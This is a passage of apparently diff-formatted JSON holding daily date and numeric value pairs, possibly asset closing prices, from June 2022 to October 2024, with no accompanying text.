"2022-06-13", + 15.09295654296875 + ], + [ + "2022-06-14", + 15.296782493591309 + ], + [ + "2022-06-15", + 16.121801376342773 + ], + [ + "2022-06-16", + 13.171151161193848 + ], + [ + "2022-06-17", + 13.297329902648926 + ], + [ + "2022-06-21", + 14.364999771118164 + ], + [ + "2022-06-22", + 13.887819290161133 + ], + [ + "2022-06-23", + 13.61569881439209 + ], + [ + "2022-06-24", + 15.365039825439453 + ], + [ + "2022-06-27", + 15.355320930480957 + ], + [ + "2022-06-28", + 14.150221824645996 + ], + [ + "2022-06-29", + 13.168644905090332 + ], + [ + "2022-06-30", + 12.731310844421387 + ], + [ + "2022-07-01", + 11.273527145385742 + ], + [ + "2022-07-05", + 11.516490936279297 + ], + [ + "2022-07-06", + 11.749736785888672 + ], + [ + "2022-07-07", + 13.324142456054688 + ], + [ + "2022-07-08", + 13.518512725830078 + ], + [ + "2022-07-11", + 12.546658515930176 + ], + [ + "2022-07-12", + 12.604968070983887 + ], + [ + "2022-07-13", + 12.915962219238281 + ], + [ + "2022-07-14", + 13.67401123046875 + ], + [ + "2022-07-15", + 14.684741020202637 + ], + [ + "2022-07-18", + 14.50008773803711 + ], + [ + "2022-07-19", + 16.47295379638672 + ], + [ + "2022-07-20", + 17.687772750854492 + ], + [ + "2022-07-21", + 18.562442779541016 + ], + [ + "2022-07-22", + 17.153255462646484 + ], + [ + "2022-07-25", + 16.813106536865234 + ], + [ + "2022-07-26", + 15.9675931930542 + ], + [ + "2022-07-27", + 18.202861785888672 + ], + [ + "2022-07-28", + 18.824848175048828 + ], + [ + "2022-07-29", + 19.271896362304688 + ], + [ + "2022-08-01", + 19.446836471557617 + ], + [ + "2022-08-02", + 19.35936737060547 + ], + [ + "2022-08-03", + 20.943492889404297 + ], + [ + "2022-08-04", + 21.448854446411133 + ], + [ + "2022-08-05", + 20.95321273803711 + ], + [ + "2022-08-08", + 19.9619197845459 + ], + [ + "2022-08-09", + 17.192129135131836 + ], + [ + "2022-08-10", + 19.349647521972656 + ], + [ + "2022-08-11", + 19.22330665588379 + ], + [ + "2022-08-12", + 20.992084503173828 + ], + [ + "2022-08-15", + 21.167020797729492 + ], + [ + "2022-08-16", + 20.545026779174805 + ], + [ + "2022-08-17", + 18.999780654907227 + ], + [ + "2022-08-18", + 20.302064895629883 + ], + [ + "2022-08-19", + 18.630475997924805 + ], + [ + "2022-08-22", + 16.5604248046875 + ], + [ + "2022-08-23", + 16.842262268066406 + ], + [ + "2022-08-24", + 16.920007705688477 + ], + [ + "2022-08-25", + 18.7762508392334 + ], + [ + "2022-08-26", + 15.530252456665039 + ], + [ + "2022-08-29", + 14.626428604125977 + ], + [ + "2022-08-30", + 14.062753677368164 + ], + [ + "2022-08-31", + 13.644854545593262 + ], + [ + "2022-09-01", + 12.847933769226074 + ], + [ + "2022-09-02", + 12.498064041137695 + ], + [ + "2022-09-06", + 12.07044792175293 + ], + [ + "2022-09-07", + 12.624405860900879 + ], + [ + "2022-09-08", + 13.26583194732666 + ], + [ + "2022-09-09", + 14.237686157226562 + ], + [ + "2022-09-12", + 14.364027976989746 + ], + [ + "2022-09-13", + 11.749736785888672 + ], + [ + "2022-09-14", + 12.109321594238281 + ], + [ + "2022-09-15", + 11.574801445007324 + ], + [ + "2022-09-16", + 11.720580101013184 + ], + [ + "2022-09-19", + 11.91495132446289 + ], + [ + "2022-09-20", + 11.40793228149414 + ], + [ + "2022-09-21", + 11.115421295166016 + ], + [ + "2022-09-22", + 10.247639656066895 + ], + [ + "2022-09-23", + 9.779620170593262 + ], + [ + "2022-09-26", + 9.311601638793945 + ], + [ + "2022-09-27", + 9.565112113952637 + ], + [ + "2022-09-28", + 9.916126251220703 + ], + [ + "2022-09-29", + 9.05809211730957 + ], + [ + "2022-09-30", + 8.638827323913574 + ], + [ + "2022-10-03", + 9.457858085632324 + ], + [ + "2022-10-04", + 10.764406204223633 + ], + [ + "2022-10-05", + 11.134922981262207 + ], + [ + "2022-10-06", + 10.910662651062012 + ], + [ + "2022-10-07", + 8.98008918762207 + ], + [ + "2022-10-10", + 8.073307037353516 + ], + [ + "2022-10-11", + 7.381030082702637 + ], + [ + "2022-10-12", + 7.156771183013916 + ], + [ + "2022-10-13", + 7.800295829772949 + ], + [ + "2022-10-14", + 6.75700569152832 + ], + [ + "2022-10-17", + 7.147021293640137 + ], + [ + "2022-10-18", + 7.215272903442383 + ], + [ + "2022-10-19", + 7.381030082702637 + ], + [ + "2022-10-20", + 7.507783889770508 + ], + [ + "2022-10-21", + 8.36581802368164 + ], + [ + "2022-10-24", + 8.463322639465332 + ], + [ + "2022-10-25", + 9.02884292602539 + ], + [ + "2022-10-26", + 8.785083770751953 + ], + [ + "2022-10-27", + 8.307315826416016 + ], + [ + "2022-10-28", + 9.26285171508789 + ], + [ + "2022-10-31", + 8.6973295211792 + ], + [ + "2022-11-01", + 8.872835159301758 + ], + [ + "2022-11-02", + 8.034303665161133 + ], + [ + "2022-11-03", + 7.693040370941162 + ], + [ + "2022-11-04", + 8.765583038330078 + ], + [ + "2022-11-07", + 9.350603103637695 + ], + [ + "2022-11-08", + 9.916126251220703 + ], + [ + "2022-11-09", + 9.0093412399292 + ], + [ + "2022-11-10", + 11.778446197509766 + ], + [ + "2022-11-11", + 12.889988899230957 + ], + [ + "2022-11-14", + 12.45122241973877 + ], + [ + "2022-11-15", + 13.523762702941895 + ], + [ + "2022-11-16", + 11.82719898223877 + ], + [ + "2022-11-17", + 12.06120777130127 + ], + [ + "2022-11-18", + 12.178210258483887 + ], + [ + "2022-11-21", + 11.593189239501953 + ], + [ + "2022-11-22", + 12.57797622680664 + ], + [ + "2022-11-23", + 12.9874906539917 + ], + [ + "2022-11-25", + 12.538973808288574 + ], + [ + "2022-11-28", + 11.544438362121582 + ], + [ + "2022-11-29", + 11.437183380126953 + ], + [ + "2022-11-30", + 13.475010871887207 + ], + [ + "2022-12-01", + 13.162997245788574 + ], + [ + "2022-12-02", + 12.704730987548828 + ], + [ + "2022-12-05", + 12.275713920593262 + ], + [ + "2022-12-06", + 11.427433013916016 + ], + [ + "2022-12-07", + 11.40793228149414 + ], + [ + "2022-12-08", + 12.304966926574707 + ], + [ + "2022-12-09", + 12.012453079223633 + ], + [ + "2022-12-12", + 12.655978202819824 + ], + [ + "2022-12-13", + 13.289752960205078 + ], + [ + "2022-12-14", + 12.675479888916016 + ], + [ + "2022-12-15", + 11.115421295166016 + ], + [ + "2022-12-16", + 10.832658767700195 + ], + [ + "2022-12-19", + 10.423145294189453 + ], + [ + "2022-12-20", + 10.186344146728516 + ], + [ + "2022-12-21", + 10.900660514831543 + ], + [ + "2022-12-22", + 9.569880485534668 + ], + [ + "2022-12-23", + 9.560093879699707 + ], + [ + "2022-12-27", + 9.070837020874023 + ], + [ + "2022-12-28", + 8.669644355773926 + ], + [ + "2022-12-29", + 9.462242126464844 + ], + [ + "2022-12-30", + 9.462242126464844 + ], + [ + "2023-01-03", + 9.158902168273926 + ], + [ + "2023-01-04", + 9.853647232055664 + ], + [ + "2023-01-05", + 9.364391326904297 + ], + [ + "2023-01-06", + 10.636459350585938 + ], + [ + "2023-01-09", + 11.282279968261719 + ], + [ + "2023-01-10", + 11.712827682495117 + ], + [ + "2023-01-11", + 12.133589744567871 + ], + [ + "2023-01-12", + 12.544565200805664 + ], + [ + "2023-01-13", + 12.671772003173828 + ], + [ + "2023-01-17", + 12.779410362243652 + ], + [ + "2023-01-18", + 12.544565200805664 + ], + [ + "2023-01-19", + 11.51712417602539 + ], + [ + "2023-01-20", + 12.515210151672363 + ], + [ + "2023-01-23", + 14.423314094543457 + ], + [ + "2023-01-24", + 14.1297607421875 + ], + [ + "2023-01-25", + 14.217826843261719 + ], + [ + "2023-01-26", + 14.912572860717773 + ], + [ + "2023-01-27", + 14.658157348632812 + ], + [ + "2023-01-30", + 13.503510475158691 + ], + [ + "2023-01-31", + 14.208043098449707 + ], + [ + "2023-02-01", + 16.43905258178711 + ], + [ + "2023-02-02", + 17.534992218017578 + ], + [ + "2023-02-03", + 16.566265106201172 + ], + [ + "2023-02-06", + 15.754096984863281 + ], + [ + "2023-02-07", + 17.212081909179688 + ], + [ + "2023-02-08", + 16.135717391967773 + ], + [ + "2023-02-09", + 16.223785400390625 + ], + [ + "2023-02-10", + 15.460541725158691 + ], + [ + "2023-02-13", + 16.067222595214844 + ], + [ + "2023-02-14", + 16.957670211791992 + ], + [ + "2023-02-15", + 17.163158416748047 + ], + [ + "2023-02-16", + 15.930229187011719 + ], + [ + "2023-02-17", + 15.166985511779785 + ], + [ + "2023-02-21", + 13.708998680114746 + ], + [ + "2023-02-22", + 13.532865524291992 + ], + [ + "2023-02-23", + 14.756011009216309 + ], + [ + "2023-02-24", + 14.002554893493652 + ], + [ + "2023-02-27", + 14.188470840454102 + ], + [ + "2023-02-28", + 14.335248947143555 + ], + [ + "2023-03-01", + 14.364603996276855 + ], + [ + "2023-03-02", + 14.68751335144043 + ], + [ + "2023-03-03", + 15.343119621276855 + ], + [ + "2023-03-06", + 14.844074249267578 + ], + [ + "2023-03-07", + 14.335248947143555 + ], + [ + "2023-03-08", + 15.47032642364502 + ], + [ + "2023-03-09", + 14.5896635055542 + ], + [ + "2023-03-10", + 13.748139381408691 + ], + [ + "2023-03-13", + 13.718783378601074 + ], + [ + "2023-03-14", + 14.893001556396484 + ], + [ + "2023-03-15", + 14.374387741088867 + ], + [ + "2023-03-16", + 16.067222595214844 + ], + [ + "2023-03-17", + 15.78345012664795 + ], + [ + "2023-03-20", + 16.253141403198242 + ], + [ + "2023-03-21", + 16.336437225341797 + ], + [ + "2023-03-22", + 15.915042877197266 + ], + [ + "2023-03-23", + 17.140029907226562 + ], + [ + "2023-03-24", + 16.238439559936523 + ], + [ + "2023-03-27", + 15.650444030761719 + ], + [ + "2023-03-28", + 15.31724739074707 + ], + [ + "2023-03-29", + 16.738235473632812 + ], + [ + "2023-03-30", + 17.5908260345459 + ], + [ + "2023-03-31", + 17.933820724487305 + ], + [ + "2023-04-03", + 17.45362663269043 + ], + [ + "2023-04-04", + 16.45403480529785 + ], + [ + "2023-04-05", + 15.601444244384766 + ], + [ + "2023-04-06", + 15.346647262573242 + ], + [ + "2023-04-10", + 16.062042236328125 + ], + [ + "2023-04-11", + 15.885642051696777 + ], + [ + "2023-04-12", + 15.0232515335083 + ], + [ + "2023-04-13", + 15.356447219848633 + ], + [ + "2023-04-14", + 15.268248558044434 + ], + [ + "2023-04-17", + 15.268248558044434 + ], + [ + "2023-04-18", + 15.464244842529297 + ], + [ + "2023-04-19", + 14.954651832580566 + ], + [ + "2023-04-20", + 14.895851135253906 + ], + [ + "2023-04-21", + 14.562657356262207 + ], + [ + "2023-04-24", + 14.337259292602539 + ], + [ + "2023-04-25", + 12.935872077941895 + ], + [ + "2023-04-26", + 13.102468490600586 + ], + [ + "2023-04-27", + 13.269068717956543 + ], + [ + "2023-04-28", + 13.945261001586914 + ], + [ + "2023-05-01", + 14.366659164428711 + ], + [ + "2023-05-02", + 14.062861442565918 + ], + [ + "2023-05-03", + 13.563064575195312 + ], + [ + "2023-05-04", + 13.327868461608887 + ], + [ + "2023-05-05", + 14.180459022521973 + ], + [ + "2023-05-08", + 14.356857299804688 + ], + [ + "2023-05-09", + 13.661064147949219 + ], + [ + "2023-05-10", + 14.023662567138672 + ], + [ + "2023-05-11", + 13.788463592529297 + ], + [ + "2023-05-12", + 13.739462852478027 + ], + [ + "2023-05-15", + 14.807652473449707 + ], + [ + "2023-05-16", + 14.748854637145996 + ], + [ + "2023-05-17", + 15.817045211791992 + ], + [ + "2023-05-18", + 17.316431045532227 + ], + [ + "2023-05-19", + 17.042030334472656 + ], + [ + "2023-05-22", + 17.179231643676758 + ], + [ + "2023-05-23", + 16.581438064575195 + ], + [ + "2023-05-24", + 15.709244728088379 + ], + [ + "2023-05-25", + 18.76681137084961 + ], + [ + "2023-05-26", + 22.422176361083984 + ], + [ + "2023-05-30", + 22.412382125854492 + ], + [ + "2023-05-31", + 20.726795196533203 + ], + [ + "2023-06-01", + 21.716583251953125 + ], + [ + "2023-06-02", + 21.579387664794922 + ], + [ + "2023-06-05", + 20.55039405822754 + ], + [ + "2023-06-06", + 21.29518699645996 + ], + [ + "2023-06-07", + 21.206987380981445 + ], + [ + "2023-06-08", + 21.834184646606445 + ], + [ + "2023-06-09", + 21.9517822265625 + ], + [ + "2023-06-12", + 24.10776138305664 + ], + [ + "2023-06-13", + 25.04854965209961 + ], + [ + "2023-06-14", + 26.10694122314453 + ], + [ + "2023-06-15", + 25.430747985839844 + ], + [ + "2023-06-16", + 24.734954833984375 + ], + [ + "2023-06-20", + 24.156761169433594 + ], + [ + "2023-06-21", + 22.358646392822266 + ], + [ + "2023-06-22", + 22.6727294921875 + ], + [ + "2023-06-23", + 21.485107421875 + ], + [ + "2023-06-26", + 21.681407928466797 + ], + [ + "2023-06-27", + 23.919233322143555 + ], + [ + "2023-06-28", + 23.281259536743164 + ], + [ + "2023-06-29", + 23.36959457397461 + ], + [ + "2023-06-30", + 24.370725631713867 + ], + [ + "2023-07-03", + 25.018522262573242 + ], + [ + "2023-07-05", + 23.40885353088379 + ], + [ + "2023-07-06", + 22.554946899414062 + ], + [ + "2023-07-07", + 22.53531837463379 + ], + [ + "2023-07-10", + 23.87016487121582 + ], + [ + "2023-07-11", + 23.889789581298828 + ], + [ + "2023-07-12", + 25.21482276916504 + ], + [ + "2023-07-13", + 26.77541160583496 + ], + [ + "2023-07-14", + 25.744829177856445 + ], + [ + "2023-07-17", + 27.54098129272461 + ], + [ + "2023-07-18", + 27.737285614013672 + ], + [ + "2023-07-19", + 26.785226821899414 + ], + [ + "2023-07-20", + 23.840715408325195 + ], + [ + "2023-07-21", + 24.459062576293945 + ], + [ + "2023-07-24", + 24.439430236816406 + ], + [ + "2023-07-25", + 25.64668083190918 + ], + [ + "2023-07-26", + 24.59646987915039 + ], + [ + "2023-07-27", + 25.97057342529297 + ], + [ + "2023-07-28", + 27.629316329956055 + ], + [ + "2023-07-31", + 27.88450813293457 + ], + [ + "2023-08-01", + 28.002290725708008 + ], + [ + "2023-08-02", + 24.812402725219727 + ], + [ + "2023-08-03", + 24.684810638427734 + ], + [ + "2023-08-04", + 24.419801712036133 + ], + [ + "2023-08-07", + 25.185375213623047 + ], + [ + "2023-08-08", + 24.007572174072266 + ], + [ + "2023-08-09", + 22.66291046142578 + ], + [ + "2023-08-10", + 22.388090133666992 + ], + [ + "2023-08-11", + 20.748979568481445 + ], + [ + "2023-08-14", + 22.505874633789062 + ], + [ + "2023-08-15", + 21.396774291992188 + ], + [ + "2023-08-16", + 20.150264739990234 + ], + [ + "2023-08-17", + 19.54172706604004 + ], + [ + "2023-08-18", + 19.777294158935547 + ], + [ + "2023-08-21", + 21.47529411315918 + ], + [ + "2023-08-22", + 20.955095291137695 + ], + [ + "2023-08-23", + 22.181974411010742 + ], + [ + "2023-08-24", + 20.032482147216797 + ], + [ + "2023-08-25", + 20.277860641479492 + ], + [ + "2023-08-28", + 21.023801803588867 + ], + [ + "2023-08-29", + 22.643278121948242 + ], + [ + "2023-08-30", + 22.967180252075195 + ], + [ + "2023-08-31", + 23.418672561645508 + ], + [ + "2023-09-01", + 23.575706481933594 + ], + [ + "2023-09-05", + 23.575706481933594 + ], + [ + "2023-09-06", + 23.006441116333008 + ], + [ + "2023-09-07", + 21.465478897094727 + ], + [ + "2023-09-08", + 21.10232162475586 + ], + [ + "2023-09-11", + 21.053245544433594 + ], + [ + "2023-09-12", + 20.552682876586914 + ], + [ + "2023-09-13", + 20.83731460571289 + ], + [ + "2023-09-14", + 21.24954605102539 + ], + [ + "2023-09-15", + 19.423952102661133 + ], + [ + "2023-09-18", + 19.56136131286621 + ], + [ + "2023-09-19", + 19.102237701416016 + ], + [ + "2023-09-20", + 18.168264389038086 + ], + [ + "2023-09-21", + 17.126144409179688 + ], + [ + "2023-09-22", + 17.539058685302734 + ], + [ + "2023-09-25", + 17.912649154663086 + ], + [ + "2023-09-26", + 16.94917869567871 + ], + [ + "2023-09-27", + 17.38176155090332 + ], + [ + "2023-09-28", + 18.3255672454834 + ], + [ + "2023-09-29", + 18.551685333251953 + ], + [ + "2023-10-02", + 18.758142471313477 + ], + [ + "2023-10-03", + 17.588218688964844 + ], + [ + "2023-10-04", + 18.3255672454834 + ], + [ + "2023-10-05", + 18.089614868164062 + ], + [ + "2023-10-06", + 19.141563415527344 + ], + [ + "2023-10-09", + 19.053083419799805 + ], + [ + "2023-10-10", + 19.711780548095703 + ], + [ + "2023-10-11", + 20.164018630981445 + ], + [ + "2023-10-12", + 20.331153869628906 + ], + [ + "2023-10-13", + 18.659826278686523 + ], + [ + "2023-10-16", + 19.475830078125 + ], + [ + "2023-10-17", + 18.97443199157715 + ], + [ + "2023-10-18", + 17.971637725830078 + ], + [ + "2023-10-19", + 17.135974884033203 + ], + [ + "2023-10-20", + 16.359302520751953 + ], + [ + "2023-10-23", + 16.1135196685791 + ], + [ + "2023-10-24", + 16.7525577545166 + ], + [ + "2023-10-25", + 14.717474937438965 + ], + [ + "2023-10-26", + 14.481522560119629 + ], + [ + "2023-10-27", + 14.845282554626465 + ], + [ + "2023-10-30", + 14.284895896911621 + ], + [ + "2023-10-31", + 14.64865493774414 + ], + [ + "2023-11-01", + 15.68094253540039 + ], + [ + "2023-11-02", + 16.791881561279297 + ], + [ + "2023-11-03", + 18.0699520111084 + ], + [ + "2023-11-06", + 17.9421443939209 + ], + [ + "2023-11-07", + 18.286243438720703 + ], + [ + "2023-11-08", + 18.355058670043945 + ], + [ + "2023-11-09", + 18.079782485961914 + ], + [ + "2023-11-10", + 20.252504348754883 + ], + [ + "2023-11-13", + 19.682287216186523 + ], + [ + "2023-11-14", + 21.766523361206055 + ], + [ + "2023-11-15", + 22.248258590698242 + ], + [ + "2023-11-16", + 22.336740493774414 + ], + [ + "2023-11-17", + 22.739826202392578 + ], + [ + "2023-11-20", + 23.772109985351562 + ], + [ + "2023-11-21", + 22.454715728759766 + ], + [ + "2023-11-22", + 22.612018585205078 + ], + [ + "2023-11-24", + 22.700502395629883 + ], + [ + "2023-11-27", + 22.582523345947266 + ], + [ + "2023-11-28", + 22.159780502319336 + ], + [ + "2023-11-29", + 22.828304290771484 + ], + [ + "2023-11-30", + 22.425220489501953 + ], + [ + "2023-12-01", + 22.680837631225586 + ], + [ + "2023-12-04", + 21.933656692504883 + ], + [ + "2023-12-05", + 21.560068130493164 + ], + [ + "2023-12-06", + 21.107824325561523 + ], + [ + "2023-12-07", + 22.788978576660156 + ], + [ + "2023-12-08", + 23.300209045410156 + ], + [ + "2023-12-11", + 25.669557571411133 + ], + [ + "2023-12-12", + 26.20044708251953 + ], + [ + "2023-12-13", + 27.449020385742188 + ], + [ + "2023-12-14", + 29.680728912353516 + ], + [ + "2023-12-15", + 30.0543212890625 + ], + [ + "2023-12-18", + 29.779043197631836 + ], + [ + "2023-12-19", + 30.231285095214844 + ], + [ + "2023-12-20", + 27.625988006591797 + ], + [ + "2023-12-21", + 29.816396713256836 + ], + [ + "2023-12-22", + 30.06273651123047 + ], + [ + "2023-12-26", + 31.68854522705078 + ], + [ + "2023-12-27", + 31.87575912475586 + ], + [ + "2023-12-28", + 31.747661590576172 + ], + [ + "2023-12-29", + 30.93968391418457 + ], + [ + "2024-01-02", + 27.628942489624023 + ], + [ + "2024-01-03", + 25.86518096923828 + ], + [ + "2024-01-04", + 25.205005645751953 + ], + [ + "2024-01-05", + 25.549875259399414 + ], + [ + "2024-01-08", + 28.013225555419922 + ], + [ + "2024-01-09", + 28.003372192382812 + ], + [ + "2024-01-10", + 27.757036209106445 + ], + [ + "2024-01-11", + 28.042781829833984 + ], + [ + "2024-01-12", + 27.688060760498047 + ], + [ + "2024-01-16", + 28.762081146240234 + ], + [ + "2024-01-17", + 28.013225555419922 + ], + [ + "2024-01-18", + 30.732763290405273 + ], + [ + "2024-01-19", + 34.348968505859375 + ], + [ + "2024-01-22", + 34.743099212646484 + ], + [ + "2024-01-23", + 35.3934211730957 + ], + [ + "2024-01-24", + 36.871437072753906 + ], + [ + "2024-01-25", + 36.575836181640625 + ], + [ + "2024-01-26", + 33.51142120361328 + ], + [ + "2024-01-29", + 34.52632522583008 + ], + [ + "2024-01-30", + 33.038455963134766 + ], + [ + "2024-01-31", + 31.629423141479492 + ], + [ + "2024-02-01", + 31.974294662475586 + ], + [ + "2024-02-02", + 33.156700134277344 + ], + [ + "2024-02-05", + 34.585445404052734 + ], + [ + "2024-02-06", + 33.334068298339844 + ], + [ + "2024-02-07", + 34.84163284301758 + ], + [ + "2024-02-08", + 36.60539245605469 + ], + [ + "2024-02-09", + 38.74357604980469 + ], + [ + "2024-02-12", + 38.57607650756836 + ], + [ + "2024-02-13", + 36.2999382019043 + ], + [ + "2024-02-14", + 38.546512603759766 + ], + [ + "2024-02-15", + 38.53666305541992 + ], + [ + "2024-02-16", + 37.76809310913086 + ], + [ + "2024-02-20", + 35.88609313964844 + ], + [ + "2024-02-21", + 35.610198974609375 + ], + [ + "2024-02-22", + 40.81279754638672 + ], + [ + "2024-02-23", + 39.58111572265625 + ], + [ + "2024-02-26", + 40.605873107910156 + ], + [ + "2024-02-27", + 40.50733947753906 + ], + [ + "2024-02-28", + 39.21654510498047 + ], + [ + "2024-02-29", + 42.21198272705078 + ], + [ + "2024-03-01", + 47.621498107910156 + ], + [ + "2024-03-04", + 49.040382385253906 + ], + [ + "2024-03-05", + 46.153343200683594 + ], + [ + "2024-03-06", + 49.483795166015625 + ], + [ + "2024-03-07", + 54.50902557373047 + ], + [ + "2024-03-08", + 48.23241424560547 + ], + [ + "2024-03-11", + 46.08436584472656 + ], + [ + "2024-03-12", + 48.85316848754883 + ], + [ + "2024-03-13", + 45.40447998046875 + ], + [ + "2024-03-14", + 42.8918571472168 + ], + [ + "2024-03-15", + 42.113441467285156 + ], + [ + "2024-03-18", + 41.91637420654297 + ], + [ + "2024-03-19", + 40.84640121459961 + ], + [ + "2024-03-20", + 42.79898452758789 + ], + [ + "2024-03-21", + 45.66868209838867 + ], + [ + "2024-03-22", + 45.787025451660156 + ], + [ + "2024-03-25", + 45.25450134277344 + ], + [ + "2024-03-26", + 44.40641403198242 + ], + [ + "2024-03-27", + 45.85606002807617 + ], + [ + "2024-03-28", + 45.88563537597656 + ], + [ + "2024-04-01", + 47.32542037963867 + ], + [ + "2024-04-02", + 45.2446403503418 + ], + [ + "2024-04-03", + 45.55034637451172 + ], + [ + "2024-04-04", + 41.78324508666992 + ], + [ + "2024-04-05", + 43.01594161987305 + ], + [ + "2024-04-08", + 43.39067840576172 + ], + [ + "2024-04-09", + 44.76142501831055 + ], + [ + "2024-04-10", + 42.49327850341797 + ], + [ + "2024-04-11", + 45.165748596191406 + ], + [ + "2024-04-12", + 40.935150146484375 + ], + [ + "2024-04-15", + 39.22910690307617 + ], + [ + "2024-04-16", + 39.97859191894531 + ], + [ + "2024-04-17", + 36.546783447265625 + ], + [ + "2024-04-18", + 34.42655563354492 + ], + [ + "2024-04-19", + 30.36361312866211 + ], + [ + "2024-04-22", + 31.625883102416992 + ], + [ + "2024-04-23", + 33.637630462646484 + ], + [ + "2024-04-24", + 34.9985237121582 + ], + [ + "2024-04-25", + 36.89193344116211 + ], + [ + "2024-04-26", + 39.24884033203125 + ], + [ + "2024-04-29", + 40.04762268066406 + ], + [ + "2024-04-30", + 37.651268005371094 + ], + [ + "2024-05-01", + 33.89403533935547 + ], + [ + "2024-05-02", + 35.94523239135742 + ], + [ + "2024-05-03", + 38.430328369140625 + ], + [ + "2024-05-06", + 40.728065490722656 + ], + [ + "2024-05-07", + 39.801082611083984 + ], + [ + "2024-05-08", + 39.85039138793945 + ], + [ + "2024-05-09", + 39.40662384033203 + ], + [ + "2024-05-10", + 40.4618034362793 + ], + [ + "2024-05-13", + 40.698482513427734 + ], + [ + "2024-05-14", + 42.61161804199219 + ], + [ + "2024-05-15", + 46.3491325378418 + ], + [ + "2024-05-16", + 45.61937713623047 + ], + [ + "2024-05-17", + 44.77128601074219 + ], + [ + "2024-05-20", + 47.58182144165039 + ], + [ + "2024-05-21", + 47.3155632019043 + ], + [ + "2024-05-22", + 48.696170806884766 + ], + [ + "2024-05-23", + 48.134063720703125 + ], + [ + "2024-05-24", + 50.727638244628906 + ], + [ + "2024-05-28", + 53.2916374206543 + ], + [ + "2024-05-29", + 50.274009704589844 + ], + [ + "2024-05-30", + 49.30758285522461 + ], + [ + "2024-05-31", + 47.917110443115234 + ], + [ + "2024-06-03", + 47.917110443115234 + ], + [ + "2024-06-04", + 46.93095779418945 + ], + [ + "2024-06-05", + 52.778839111328125 + ], + [ + "2024-06-06", + 51.7828254699707 + ], + [ + "2024-06-07", + 51.15168380737305 + ], + [ + "2024-06-10", + 53.20288848876953 + ], + [ + "2024-06-11", + 53.41983413696289 + ], + [ + "2024-06-12", + 57.90683364868164 + ], + [ + "2024-06-13", + 60.017189025878906 + ], + [ + "2024-06-14", + 59.26771926879883 + ], + [ + "2024-06-17", + 61.8021240234375 + ], + [ + "2024-06-18", + 64.33654022216797 + ], + [ + "2024-06-20", + 59.18882751464844 + ], + [ + "2024-06-21", + 57.39402770996094 + ], + [ + "2024-06-24", + 52.482994079589844 + ], + [ + "2024-06-25", + 54.687294006347656 + ], + [ + "2024-06-26", + 54.173057556152344 + ], + [ + "2024-06-27", + 53.20391845703125 + ], + [ + "2024-06-28", + 54.74663162231445 + ], + [ + "2024-07-01", + 54.74663162231445 + ], + [ + "2024-07-02", + 56.96181106567383 + ], + [ + "2024-07-03", + 59.72090148925781 + ], + [ + "2024-07-05", + 60.13624572753906 + ], + [ + "2024-07-08", + 63.597469329833984 + ], + [ + "2024-07-09", + 63.53813552856445 + ], + [ + "2024-07-10", + 67.83003997802734 + ], + [ + "2024-07-11", + 61.30317687988281 + ], + [ + "2024-07-12", + 63.2315673828125 + ], + [ + "2024-07-15", + 63.42934799194336 + ], + [ + "2024-07-16", + 64.57649993896484 + ], + [ + "2024-07-17", + 50.978843688964844 + ], + [ + "2024-07-18", + 51.087623596191406 + ], + [ + "2024-07-19", + 46.4792594909668 + ], + [ + "2024-07-22", + 52.34355545043945 + ], + [ + "2024-07-23", + 49.970149993896484 + ], + [ + "2024-07-24", + 42.4246826171875 + ], + [ + "2024-07-25", + 39.3392448425293 + ], + [ + "2024-07-26", + 41.45553970336914 + ], + [ + "2024-07-29", + 41.346763610839844 + ], + [ + "2024-07-30", + 36.827396392822266 + ], + [ + "2024-07-31", + 43.89817428588867 + ], + [ + "2024-08-01", + 34.612213134765625 + ], + [ + "2024-08-02", + 29.014923095703125 + ], + [ + "2024-08-05", + 27.58098793029785 + ], + [ + "2024-08-06", + 28.263341903686523 + ], + [ + "2024-08-07", + 25.929489135742188 + ], + [ + "2024-08-08", + 31.111433029174805 + ], + [ + "2024-08-09", + 30.66642189025879 + ], + [ + "2024-08-12", + 31.061988830566406 + ], + [ + "2024-08-13", + 34.88911056518555 + ], + [ + "2024-08-14", + 34.66166305541992 + ], + [ + "2024-08-15", + 39.47770309448242 + ], + [ + "2024-08-16", + 39.2898063659668 + ], + [ + "2024-08-19", + 41.13908386230469 + ], + [ + "2024-08-20", + 39.645816802978516 + ], + [ + "2024-08-21", + 41.26765060424805 + ], + [ + "2024-08-22", + 37.09440231323242 + ], + [ + "2024-08-23", + 39.9523811340332 + ], + [ + "2024-08-26", + 36.955955505371094 + ], + [ + "2024-08-27", + 38.06354904174805 + ], + [ + "2024-08-28", + 36.19448471069336 + ], + [ + "2024-08-29", + 35.789024353027344 + ], + [ + "2024-08-30", + 38.3602180480957 + ], + [ + "2024-09-03", + 29.736833572387695 + ], + [ + "2024-09-04", + 29.96428680419922 + ], + [ + "2024-09-05", + 29.420381546020508 + ], + [ + "2024-09-06", + 25.67237091064453 + ], + [ + "2024-09-09", + 27.126087188720703 + ], + [ + "2024-09-10", + 28.0358943939209 + ], + [ + "2024-09-11", + 31.863012313842773 + ], + [ + "2024-09-12", + 31.457557678222656 + ], + [ + "2024-09-13", + 33.059608459472656 + ], + [ + "2024-09-16", + 31.803678512573242 + ], + [ + "2024-09-17", + 31.803678512573242 + ], + [ + "2024-09-18", + 30.794979095458984 + ], + [ + "2024-09-19", + 34.73088455200195 + ], + [ + "2024-09-20", + 33.178279876708984 + ], + [ + "2024-09-23", + 33.5441780090332 + ], + [ + "2024-09-24", + 34.74289321899414 + ], + [ + "2024-09-25", + 35.406646728515625 + ], + [ + "2024-09-26", + 39.280174255371094 + ], + [ + "2024-09-27", + 37.308738708496094 + ], + [ + "2024-09-30", + 36.33787536621094 + ], + [ + "2024-10-01", + 33.514461517333984 + ], + [ + "2024-10-02", + 34.63391876220703 + ], + [ + "2024-10-03", + 34.881587982177734 + ], + [ + "2024-10-04", + 36.33787536621094 + ], + [ + "2024-10-07", + 36.07039260864258 + ], + [ + "2024-10-08", + 37.110599517822266 + ], + [ + "2024-10-09", + 38.2498779296875 + ], + [ + "2024-10-10", + 37.47715377807617 + ], + [ + "2024-10-11", + 38.30931091308594 + ], + [ + "2024-10-14", + 40.43925857543945 + ], + [ + "2024-10-15", + 34.14849090576172 + ], + [ + "2024-10-16", + 34.138580322265625 + ], + [ + "2024-10-17", + 34.881587982177734 + ], + [ + "2024-10-18", + 34.9410285949707 + ], + [ + "2024-10-21", + 34.7627067565918 + ], + [ + "2024-10-22", + 34.36643600463867 + ], + [ + "2024-10-23", + 33.484737396240234 + ], + [ + "2024-10-24", + 33.97016906738281 + ], + [ + "2024-10-25", + 34.95093536376953 + ], + [ + "2024-10-28", + 35.02027893066406 + ], + [ + "2024-10-29", + 37.62574768066406 + ], + [ + "2024-10-30", + 33.692779541015625 + ], + [ + 